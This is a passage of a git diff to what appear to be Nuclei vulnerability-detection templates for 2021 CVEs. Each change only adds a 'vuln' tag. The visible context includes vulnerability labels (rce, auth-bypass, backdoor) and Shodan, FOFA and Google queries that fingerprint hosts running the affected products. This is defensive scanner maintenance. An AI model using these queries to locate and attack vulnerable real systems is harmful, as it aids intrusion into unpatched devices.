cve,cve2021,zyxel,auth-bypass,router,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 8483735dca3..aae44d03188 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware - tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev + tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33045.yaml b/http/cves/2021/CVE-2021-33045.yaml index 9c36ac90129..b9da6fd0e5b 100644 --- a/http/cves/2021/CVE-2021-33045.yaml +++ b/http/cves/2021/CVE-2021-33045.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware - tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev + tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 8dbfe8bb8e6..1dae3f48ec0 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: commscope product: ruckus_iot_controller - tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists + tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index dbcc9a8de6b..8b8760c2f77 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -30,7 +30,7 @@ info: product: raspap shodan-query: http.favicon.hash:-1465760059 fofa-query: icon_hash=-1465760059 - tags: cve2021,cve,rce,raspap,oast,vkev + tags: cve2021,cve,rce,raspap,oast,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index cd71c14c724..a932b019ee5 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: geutebrueck product: g-cam_ebc-2110 - tags: cve2021,cve,geutebruck,rce,oast,geutebrueck,vkev + tags: cve2021,cve,geutebruck,rce,oast,geutebrueck,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33558.yaml b/http/cves/2021/CVE-2021-33558.yaml index 25266113454..161938f3cbd 100644 --- a/http/cves/2021/CVE-2021-33558.yaml +++ b/http/cves/2021/CVE-2021-33558.yaml @@ -22,7 +22,7 @@ info: product: boa shodan-query: 'Server: Boa/0.94.13' fofa-query: "Server: Boa/0.94.13" - tags: cve,cve2021,boa,info-leak,vkev + tags: cve,cve2021,boa,info-leak,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 9e5dd971d26..e78cedbe5e9 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -28,7 +28,7 @@ info: vendor: dragonfly_project product: dragonfly framework: ruby - tags: cve2021,cve,rce,ruby,injection,dragonfly_project,vkev + tags: cve2021,cve,rce,ruby,injection,dragonfly_project,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index d4b411f56dd..6e8ad50f430 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -30,7 +30,7 @@ info: - html:"SAP NetWeaver" - http.html:"sap netweaver" fofa-query: body="sap netweaver" - tags: cve2021,cve,oast,ssrf,sap,vkev + tags: cve2021,cve,oast,ssrf,sap,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index ff14708cdee..5575722a8f9 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: rstudio product: shiny_server - tags: cve2021,cve,rstudio,traversal + tags: cve2021,cve,rstudio,traversal,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33766.yaml b/http/cves/2021/CVE-2021-33766.yaml index 2478865ee3b..01d212911ed 100644 --- a/http/cves/2021/CVE-2021-33766.yaml +++ b/http/cves/2021/CVE-2021-33766.yaml @@ -33,7 +33,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev + tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 1efa2444cb5..df9c2f61a9c 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -27,7 +27,7 @@ info: vendor: ansi_up_project product: ansi_up framework: node.js - tags: cve2021,cve,xss,npm,ansi_up_project,node.js + tags: cve2021,cve,xss,npm,ansi_up_project,node.js,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index c416df4b1c8..86b215b2b57 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: fortilogger product: fortilogger - tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive + tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 7a145addfe0..dc0fbf9e9e2 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gespage product: gespage - tags: cve2021,cve,lfi,gespage + tags: cve2021,cve,lfi,gespage,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index 7323f9191bf..02c7ef0816a 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -30,7 +30,7 @@ info: vendor: apasionados product: customize_login_image framework: wordpress - tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados + tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 2d23855e4d8..3ec3e77f8d3 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: accela product: civic_platform - tags: cve,cve2021,accela,xss,edb,packetstorm + tags: cve,cve2021,accela,xss,edb,packetstorm,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-34187.yaml b/http/cves/2021/CVE-2021-34187.yaml index 92cdbbf139f..40adedffa35 100644 --- a/http/cves/2021/CVE-2021-34187.yaml +++ b/http/cves/2021/CVE-2021-34187.yaml @@ -24,7 +24,7 @@ info: fofa-query: 'banner="X-Powered-By: Chamilo"' verified: true max-request: 1 - tags: cve,cve2021,chamilo,sqli,vkev + tags: cve,cve2021,chamilo,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 26bbc899b15..86613c26b8c 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: accela product: civic_platform - tags: cve,cve2021,xss,redirect,accela,edb + tags: cve,cve2021,xss,redirect,accela,edb,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 246d4b1b8d2..e799ebd0a27 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -29,7 +29,7 @@ info: vendor: eclipse product: jetty shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" - tags: cve2021,cve,jetty,eclipse,vkev + tags: cve2021,cve,jetty,eclipse,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 8166fd806f6..c06c6f40d75 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -36,7 +36,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft,vkev + tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index a4f2e2dee68..17c4f5d4f43 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -27,7 +27,7 @@ info: vendor: properfraction product: profilepress framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction,vkev + tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-34622.yaml b/http/cves/2021/CVE-2021-34622.yaml index 22cad2154e2..9edd607e5d4 100644 --- a/http/cves/2021/CVE-2021-34622.yaml +++ b/http/cves/2021/CVE-2021-34622.yaml @@ -23,7 +23,7 @@ info: vendor: properfraction product: profilepress fofa-query: body="/wp-content/plugins/profilepress" - tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive,vkev + tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive,vkev,vuln variables: username: "user_{{to_lower(rand_base(5))}}" diff --git a/http/cves/2021/CVE-2021-34624.yaml b/http/cves/2021/CVE-2021-34624.yaml index 49f9ef40157..6bad5b37132 100644 --- a/http/cves/2021/CVE-2021-34624.yaml +++ b/http/cves/2021/CVE-2021-34624.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="/wp-content/plugins/wp-user-avatar/" publicwww-query: "/wp-content/plugins/wp-user-avatar/" shodan-query: http.component:"profilepress" - tags: cve,cve2021,wordpress,wp-plugin,wp,wpscan,wp-user-avatar,profilepress,rce,file-upload,unauth,intrusive,vkev + tags: cve,cve2021,wordpress,wp-plugin,wp,wpscan,wp-user-avatar,profilepress,rce,file-upload,unauth,intrusive,vkev,vuln variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-34630.yaml b/http/cves/2021/CVE-2021-34630.yaml index fd42a10018e..98c8e8f8d19 100644 --- a/http/cves/2021/CVE-2021-34630.yaml +++ b/http/cves/2021/CVE-2021-34630.yaml @@ -28,7 +28,7 @@ info: product: gtranslate framework: wordpress fofa-query: body="/wp-content/plugins/gtranslate" - tags: cve,cve2022,wordpress,wp,wp-plugin,gtranslate,xss + tags: cve,cve2022,wordpress,wp,wp-plugin,gtranslate,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 5e7d5e8759a..9d40cbfddc6 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -28,7 +28,7 @@ info: vendor: securimage-wp-fixed_project product: securimage-wp-fixed framework: wordpress - tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 7b41d2740b0..27ab02ac066 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -28,7 +28,7 @@ info: vendor: skaut-bazar_project product: skaut-bazar framework: wordpress - tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 41ee9bfab15..4019eb1d893 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: land-software product: faust_iserver - tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software + tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35064.yaml b/http/cves/2021/CVE-2021-35064.yaml index a4b6c17a7d8..4f24d4eaf92 100644 --- a/http/cves/2021/CVE-2021-35064.yaml +++ b/http/cves/2021/CVE-2021-35064.yaml @@ -27,7 +27,7 @@ info: vendor: kramerav product: viaware fofa-query: icon_hash="1521468900" - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev + tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln variables: useragent: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 82acffdfb52..46128830647 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -30,7 +30,7 @@ info: shodan-query: - product:"Rhinosoft Serv-U httpd" - product:"rhinosoft serv-u httpd" - tags: cve2021,cve,solarwinds,traversal,vkev + tags: cve2021,cve,solarwinds,traversal,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index e5eb0ef4863..dbddcf13e78 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -32,7 +32,7 @@ info: - html:'content="MaxSite CMS' - http.html:'content="maxsite cms' fofa-query: body='content="maxsite cms' - tags: cve2021,cve,maxsite,xss + tags: cve2021,cve,maxsite,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index adfaa10f4d5..d44c23dc025 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -29,7 +29,7 @@ info: - http.title:"bludit" fofa-query: title="bludit" google-query: intitle:"bludit" - tags: cve2021,cve,bludit,xss + tags: cve2021,cve,bludit,xss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 92449c52284..cfc0a0a430e 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: tieline product: ip_audtio_gateway - tags: cve2021,cve,tieline,default-login + tags: cve2021,cve,tieline,default-login,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index ad48ba6360d..e2b3e1a4ea9 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: solari product: termtalk_server - tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari + tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index c570db4d411..b5dec41e95d 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: realtek product: realtek_jungle_sdk - tags: cve2021,cve,realtek,rce,kev,vkev + tags: cve2021,cve,realtek,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 7ab949c271e..25ee872b142 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -36,7 +36,7 @@ info: - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" - tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock,vkev + tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index b8087386958..f334a430e4b 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="thruk" - title=="thruk monitoring webinterface" - tags: cve2021,cve,thruk,xss + tags: cve2021,cve,thruk,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 8c400ace802..037bf0592e0 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -37,7 +37,7 @@ info: - body="/oam/pages/css/login_page.css" - title="oracle access management" google-query: intitle:"oracle access management" - tags: cve2021,cve,oam,rce,java,unauth,oracle,kev,vkev + tags: cve2021,cve,oam,rce,java,unauth,oracle,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 6c617f6f486..5e760f560a6 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: binatoneglobal product: halo\+_camera_firmware - tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal,vkev + tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index 5070fc15535..9bf33a05025 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -29,7 +29,7 @@ info: product: ds-2cd2026g2-iu\/sl_firmware shodan-query: http.favicon.hash:999357577 fofa-query: icon_hash=999357577 - tags: cve2021,cve,hikvision,rce,iot,intrusive,kev,vkev + tags: cve2021,cve,hikvision,rce,iot,intrusive,kev,vkev,vuln variables: string: "{{to_lower(rand_base(12))}}" diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 8c3745589e3..4ee764369e4 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: kramerav product: viaware - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev + tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln variables: useragent: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 6156002201f..b587eaddc25 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sunhillo product: sureline - tags: cve2021,cve,sureline,rce,oast,sunhillo,kev,vkev + tags: cve2021,cve,sureline,rce,oast,sunhillo,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 0ccfe2e0b34..10cf2080526 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -33,7 +33,7 @@ info: - http.title:"verint sign-in" fofa-query: title="verint sign-in" google-query: intitle:"verint sign-in" - tags: cve2021,cve,xss,verint + tags: cve2021,cve,xss,verint,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index b3228e5d1ac..061c5c9e7d6 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: openstack product: nova - tags: cve2021,cve,redirect,novnc,seclists,openstack + tags: cve2021,cve,redirect,novnc,seclists,openstack,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 433ef1488e7..e54047c668b 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -34,7 +34,7 @@ info: - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" - tags: cve2021,cve,icewarp,redirect + tags: cve2021,cve,icewarp,redirect,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-36646.yaml b/http/cves/2021/CVE-2021-36646.yaml index 767180b7722..bf9b25bfb77 100644 --- a/http/cves/2021/CVE-2021-36646.yaml +++ b/http/cves/2021/CVE-2021-36646.yaml @@ -23,7 +23,7 @@ info: vendor: kalcaddle product: kod-explorer fofa-query: app="Powered-by-KodExplorer" - tags: cve,cve2021,xss,kodexplorer + tags: cve,cve2021,xss,kodexplorer,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 5d93bebbc6a..ddf1c04ac46 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -28,7 +28,7 @@ info: vendor: prestahome product: blog framework: prestashop - tags: cve2021,cve,prestashop,prestahome,sqli,cms + tags: cve2021,cve,prestashop,prestahome,sqli,cms,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 59c994a9104..152210b327d 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve2021,cve,apache,lfi,auth-bypass,druid,vkev + tags: cve2021,cve,apache,lfi,auth-bypass,druid,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index a703fe27712..c04ffaeaf9d 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -28,7 +28,7 @@ info: vendor: webence product: iq_block_country framework: wordpress - tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence + tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 80334e874be..23f25d6bac3 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: qsan product: xn8024r_firmware - tags: cve,cve2021,xss,qsan,storage + tags: cve,cve2021,xss,qsan,storage,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37291.yaml b/http/cves/2021/CVE-2021-37291.yaml index 41895f82035..9b127ea3cb1 100644 --- a/http/cves/2021/CVE-2021-37291.yaml +++ b/http/cves/2021/CVE-2021-37291.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: kevinlab product: 4st_l-bems - tags: cve,cve2021,kevinlab,sqli,edb,packetstorm,vkev + tags: cve,cve2021,kevinlab,sqli,edb,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-37292.yaml b/http/cves/2021/CVE-2021-37292.yaml index 51e9f9473f0..3dd1c36d8ac 100644 --- a/http/cves/2021/CVE-2021-37292.yaml +++ b/http/cves/2021/CVE-2021-37292.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: kevinlab product: 4st_l-bems - tags: cve,cve2021,kevinlab,bems,backdoor + tags: cve,cve2021,kevinlab,bems,backdoor,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index ba2961de042..4df903f0d02 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -34,7 +34,7 @@ info: - title="jeecg-boot" - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" - tags: cve2021,cve,jeecg,exposure + tags: cve2021,cve,jeecg,exposure,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 2ddb1ef1aa3..8698065229d 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -34,7 +34,7 @@ info: - title="jeecg-boot" - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" - tags: cve2021,cve,jeecg,exposure + tags: cve2021,cve,jeecg,exposure,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 7cf362979d0..4a237cc9827 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"adselfservice plus" - intitle:"manageengine" - tags: cve2021,cve,zoho,xss,zohocorp + tags: cve2021,cve,zoho,xss,zohocorp,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index dd942750a3c..c9d967d3a1e 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -28,7 +28,7 @@ info: vendor: smartdatasoft product: smartblog framework: prestashop - tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft,vkev + tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 5bcb0d9a997..034feb64a81 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tiny_java_web_server_project product: tiny_java_web_server - tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project + tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 363a70c0acc..f25ce1bd39b 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: shenyu - tags: cve2021,cve,apache,jwt,shenyu,vkev + tags: cve2021,cve,apache,jwt,shenyu,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index 7f30d5dab29..2700aab474d 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -31,7 +31,7 @@ info: product: cobranca shodan-query: http.favicon.hash:876876147 fofa-query: icon_hash=876876147 - tags: cve,cve2021,virtua,sqli,virtuasoftware + tags: cve,cve2021,virtua,sqli,virtuasoftware,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 43725354afe..92d0c3d1f3f 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpfastcache product: phpfastcache - tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork + tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 8f1f4cb5c35..dff3b4308c6 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -34,7 +34,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve2021,cve,hoteldruid,xss,digitaldruid + tags: cve2021,cve,hoteldruid,xss,digitaldruid,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index c6584e67673..bd566aaeae9 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -25,7 +25,7 @@ info: vendor: wipro product: holmes fofa-query: title="Wipro Holmes Orchestrator" - tags: cve,cve2021,wipro,holmes,lfi + tags: cve,cve2021,wipro,holmes,lfi,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index 9e63bdd7c44..df412e02672 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -25,7 +25,7 @@ info: vendor: wipro product: 